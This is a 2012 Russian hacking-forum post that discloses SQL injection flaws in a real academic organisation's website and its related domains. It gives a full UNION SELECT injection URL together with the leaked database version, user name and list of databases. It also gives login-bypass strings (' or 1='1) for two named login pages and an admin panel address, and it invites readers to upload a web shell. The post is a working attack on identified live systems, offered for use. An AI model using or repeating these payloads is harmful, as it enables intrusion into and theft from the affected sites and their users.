05.08.2012, 00:04
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Host = www.rae.ru
Российская Академия Естесствознания
PR = 5
TYC = 1500
Inject
Код:
_ttp://www.rae.ru/fs/?section=content&op=show_article&article_id=7789203+and+1=2+union+select+1,2,3,4,5,null,7,null,9,10,11,12,null,null,null,16,17,18,19,20,21,22,23,24,25,26,null,28,29,null,31,version(),33
Info
VERSION = 5.5.24-log
USER = sup78user@localhost
DATABASE = fs
BASES:
Код:
information_schema
account
apsc
atmail
club
demo
econf
es1
express
famd
famous
forum
forum10
forum11
forum12
fs
horde
med
monogra
mysql
online
performance_schema
phpmyadmin_gAAfZmC2ngnA
psa
rae
research
rus-sci
science
se
shop
sitebuilder5
social
vak
who
Во все БД есть доступы и они от этих сайтов
1) www.rae.ru PR=5 TYC=1500
2) 15.rae.ru PR=4 TYC=0
3) express.rae.ru PR=3 TYC=0
4) gerb.rae.ru PR=4 TYC=0
5) online.rae.ru PR=3 TYC=20
6) russian-scientists.ru PR=4 TYC=30
7) science-education.ru PR=5 TYC=180
8) www.es.rae.ru PR=4 TYC=20
9) www.famous-scientists.ru PR=5 TYC=1400
10) www.monographies.ru PR=4 TYC=30
11) www.russian-scientists.ru PR=4 TYC=30
ByPass authentication SQL-Injection:
1) _ttp://online.rae.ru/login/auth/
Login = ' or 1='1
Password = ' or 1='1
2) _ttp://www.famous-scientists.ru/login/auth/
Login = admin' or 1='1
Pass = admin' or 1='1
Ну и последняя плюшка...
Админка от 1C Bitrix. Вдруг пасс расшифруете, я не смог =(
_ttp://russian-scientists.ru:8888/bitrix/admin/
З.Ы. Если зальёте шелл - напомните мне в ПМ, что я неудачник =)
|
|
|